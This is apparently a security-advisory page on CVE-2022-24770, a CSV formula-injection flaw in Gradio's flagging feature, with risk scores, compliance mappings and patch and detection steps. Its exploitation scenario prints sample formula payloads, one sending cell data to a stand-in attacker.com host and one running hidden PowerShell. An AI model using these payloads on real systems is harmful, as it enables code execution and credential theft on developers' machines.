CVE-2022-24770 — HIGH (CVSS 8.8) AI Security Vulnerability

CISO Take

Any Gradio-based ML demo with flagging enabled allows end users to inject spreadsheet formulas into developer-side CSV logs. When a developer opens that CSV in Excel or similar tools, arbitrary commands execute on their machine — a classic developer-chain attack that pivots from a public ML interface to an internal workstation. Patch to 2.8.11 immediately; if unpatched, disable flagging or configure CSV consumers to never open these files in spreadsheet software.

Risk Assessment

High risk for organizations running Gradio-powered demos or internal tools with flagging enabled. The attack requires no authentication, no AI/ML knowledge, and only basic formula injection skills — trivially accessible to any user of the demo. The impact lands on developer machines, not end users, making it a targeted developer-chain threat. Exposure is broad given Gradio's widespread adoption in ML prototyping and Hugging Face Spaces.

Affected Systems

Package	Ecosystem	Vulnerable Range	Patched
gradio	pip	—	No patch
42.5K OpenSSF 5.5 679 dependents Pushed 2d ago 27% patched ~110d to patch Full package profile →

Do you use gradio? You're affected.

Severity & Risk

CVSS 3.1

8.8 / 10

EPSS

0.6%

chance of exploitation in 30 days

Higher than 69% of all CVEs

Source: EPSS v3 — FIRST.org

Exploitation Status

Exploit Available

Exploitation: MEDIUM

Sophistication

Trivial

Exploitation Confidence

medium

○ Public PoC indexed (trickest/cve)

Composite signal derived from CISA KEV, CISA SSVC, EPSS, trickest/cve, and Nuclei templates.

Attack Surface

AV Network

AC Low

PR None

UI Required

S Unchanged

C High

I High

A High

Recommended Action

5 steps

Patch: Upgrade Gradio to 2.8.11 or later (single-quote escaping is applied to CSV outputs).
Workaround if patching is delayed: disable the flagging feature in Gradio configuration or restrict who can trigger flags.
Process control: instruct all team members to never open Gradio-generated CSVs directly in Excel — use Python/pandas for review instead.
Detection: search flagged CSV files for cells starting with =, +, -, or @ characters (formula injection markers).
Audit: review flagged CSV files already on disk for injected formulas before opening.

CISA SSVC Assessment

Decision Track

Exploitation none

Automatable No

Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

Classification

Code Execution Supply Chain Framework Inference AML.T0010.001 - AI Software AML.T0011 - User Execution AML.T0037 - Data from Local System AML.T0049 - Exploit Public-Facing Application

Compliance Impact

This CVE is relevant to:

EU AI Act

Article 9 - Risk management system

ISO 42001

A.8.4 - AI system inputs A.9.2 - Testing and validation of AI system

NIST AI RMF

MANAGE-2.2 - Mechanisms to sustain the value of deployed AI are monitored and in place MAP-1.5 - Organizational risk tolerances are determined and documented

OWASP LLM Top 10

LLM03:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2022-24770?

Any Gradio-based ML demo with flagging enabled allows end users to inject spreadsheet formulas into developer-side CSV logs. When a developer opens that CSV in Excel or similar tools, arbitrary commands execute on their machine — a classic developer-chain attack that pivots from a public ML interface to an internal workstation. Patch to 2.8.11 immediately; if unpatched, disable flagging or configure CSV consumers to never open these files in spreadsheet software.

Is CVE-2022-24770 actively exploited?

Proof-of-concept exploit code is publicly available for CVE-2022-24770, increasing the risk of exploitation.

How to fix CVE-2022-24770?

1. Patch: Upgrade Gradio to 2.8.11 or later (single-quote escaping is applied to CSV outputs). 2. Workaround if patching is delayed: disable the flagging feature in Gradio configuration or restrict who can trigger flags. 3. Process control: instruct all team members to never open Gradio-generated CSVs directly in Excel — use Python/pandas for review instead. 4. Detection: search flagged CSV files for cells starting with =, +, -, or @ characters (formula injection markers). 5. Audit: review flagged CSV files already on disk for injected formulas before opening.

What systems are affected by CVE-2022-24770?

This vulnerability affects the following AI/ML architecture patterns: ML demo platforms, model evaluation pipelines, data labeling and flagging workflows, model serving.

What is the CVSS score for CVE-2022-24770?

CVE-2022-24770 has a CVSS v3.1 base score of 8.8 (HIGH). The EPSS exploitation probability is 0.59%.

Technical Details

NVD Description

`gradio` is an open source framework for building interactive machine learning models and demos. Prior to version 2.8.11, `gradio` suffers from Improper Neutralization of Formula Elements in a CSV File. The `gradio` library has a flagging functionality which saves input/output data into a CSV file on the developer's computer. This can allow a user to save arbitrary text into the CSV file, such as commands. If a program like MS Excel opens such a file, then it automatically runs these commands, which could lead to arbitrary commands running on the user's computer. The problem has been patched as of `2.8.11`, which escapes the saved csv with single quotes. As a workaround, avoid opening csv files generated by `gradio` with Excel or similar spreadsheet programs.

Exploitation Scenario

An adversary discovers a public-facing Gradio-based ML demo (e.g., a text classification or image captioning tool). They submit a crafted input containing a CSV formula payload such as `=HYPERLINK("http://attacker.com/"&C1,"Click")` or `=cmd|'/c powershell -nop -w hidden -enc <base64payload>'!A0` as the model input. Gradio's flagging mechanism saves this input verbatim to a CSV log on the developer's machine. When the developer reviews flagged samples in Excel to identify model weaknesses, the formula executes — delivering a reverse shell or exfiltrating environment variables and credentials from the developer workstation, providing a pivot point into the organization's internal infrastructure.